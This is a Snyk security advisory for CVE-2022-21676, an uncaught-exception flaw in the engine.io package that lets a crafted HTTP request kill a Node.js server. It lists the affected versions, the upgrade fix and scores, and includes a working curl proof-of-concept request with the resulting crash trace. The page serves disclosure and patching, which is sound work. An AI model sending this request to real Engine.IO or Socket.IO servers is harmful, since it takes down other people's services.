Homepage
About Snyk

Uncaught Exception Affecting engine.io package, versions >=4.0.0 <4.1.2 >=5.0.0 <5.2.1 >=6.0.0 <6.1.1

0.0
high

Snyk CVSS

    Attack Complexity Low
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.24% (62nd percentile)
Expand this section
NVD
7.5 high

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-ENGINEIO-2336356
  • published 12 Jan 2022
  • disclosed 12 Jan 2022
  • credit Marcus Wejderot
Report a new vulnerability Found a mistake?

Introduced: 12 Jan 2022

CVE-2022-21676 Open this link in a new tab
CWE-248 Open this link in a new tab

How to fix?

Upgrade engine.io to version 4.1.2, 5.2.1, 6.1.1 or higher.

Overview

engine.io is a realtime engine behind Socket.IO. It provides the foundation of a bidirectional connection between client and server

Affected versions of this package are vulnerable to Uncaught Exception by sending a specially crafted HTTP request, that triggers an uncaught exception and kills the Node.js process that runs an Engine.IO or a Socket.IO server.

PoC:

With an Engine.IO server running on port 3000:

curl
-X 'GET'
-H $'Connection: Upgrade'
-H $'Upgrade: websocket'
-H $'Sec-WebSocket-Version: 13'
-H $'Sec-WebSocket-Key: DXR4dX615eRds8nRmlhqtw=='
-H $'Content-Type: application/x-www-form-urlencoded'
-H $'Content-Length: 27'
--data-binary 'app=cae417iahm&_method=POST'
'http://localhost:3000/engine.io/?EIO=4&transport=websocket'



//Output:


node:events:368
throw er; // Unhandled 'error' event
^


RangeError: Invalid WebSocket frame: RSV2 and RSV3 must be clear
at Receiver.getInfo (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:176:14)
at Receiver.startLoop (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:136:22)
at Receiver._write (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:83:10)
at writeOrBuffer (node:internal/streams/writable:389:12)
at _write (node:internal/streams/writable:330:10)
at Receiver.Writable.write (node:internal/streams/writable:334:10)
at Socket.socketOnData (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/websocket.js:1116:35)
at Socket.emit (node:events:390:28)
at Socket.Readable.read (node:internal/streams/readable:527:10)
at Socket.read (node:net:644:39)